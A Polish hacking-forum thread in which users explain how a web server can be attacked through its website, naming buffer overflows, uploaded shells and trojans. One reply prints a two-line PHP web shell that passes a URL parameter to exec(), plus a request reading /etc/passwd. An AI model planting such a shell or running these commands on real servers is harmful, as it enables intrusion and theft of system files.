Ze strony do serwera

[kriss9366]

Od paru dni chodzi pewno pytanie : Czy jest jakiś rodzaj ataku który przez strone www atakuje serwer ?
Mam na myśli że widać wszystko co jest na serwerze np. pliki.

P.S. Chyba Zrozumiale napisałem jak nie to prosze o poprawki i wyrozumiałość ponieważ aż tak bardzo na atakach się nie znam
pozdro
Kriss

 

[hxv]

Zdaje się że gdy np. serwer WWW jest dziurawy, zainstalowany PHP jest stary i ma błędy czy też dowolny inny program do którego można uzyskać dostęp przez stronę posiada błędy to można je wykorzystać. Jak? To już zależy od błędów, czasem DoS, czasem BoF a czasem uzyskanie dostępu do konta innego użytkownika w tym programie.
Jeśli uda ci się wgrać na stronę szela możesz czasem (gdy serwer jest niepoprawnie skonfigurowany) uzyskać dostęp do plików innych userów lub do pliku z hasłami.

 

[timpler]

hxv na czym polega BoF? Co to za atak?

 

[hxv]

Buffer overFlow

To nie tyle atak co błąd w programie który można wykorzystać do ataku

 

[Magnefikko]

Gdy serwer na prawdę ssie, możesz go dupić jak chcesz za pomocą prostych skryptów PHP do np. przeglądania plików na serwerze. Albo takich dziadostw jak to:

<?php
exec($_GET['ssij']);
?>

skrypt.php?ssij=cat ../../../../../etc/passwd

 

[timpler]

Buffer overFlow To nie tyle atak co błąd w programie który można wykorzystać do ataku[/b]

Nie no wiem czy jest Buffer Overflow tylko pierwszy raz widze skrót BoF, zawsze i wszędzie widuje skrót BO...

 

[hxv]

@timpler, poprzeglądaj sobie milw0rm, tam widziałem że tak piszą to i jak tak pisze

@topic: jeśli serwer stoi na windowsie i ma beznadziejne zabezpieczenia to można nawet trojana odpalić (to się raczej zdarza z małymi, prywatnymi serwerami).

 

[kriss9366]

Wielkie dzieki teraz już wiem to co chciałęm wiedzieć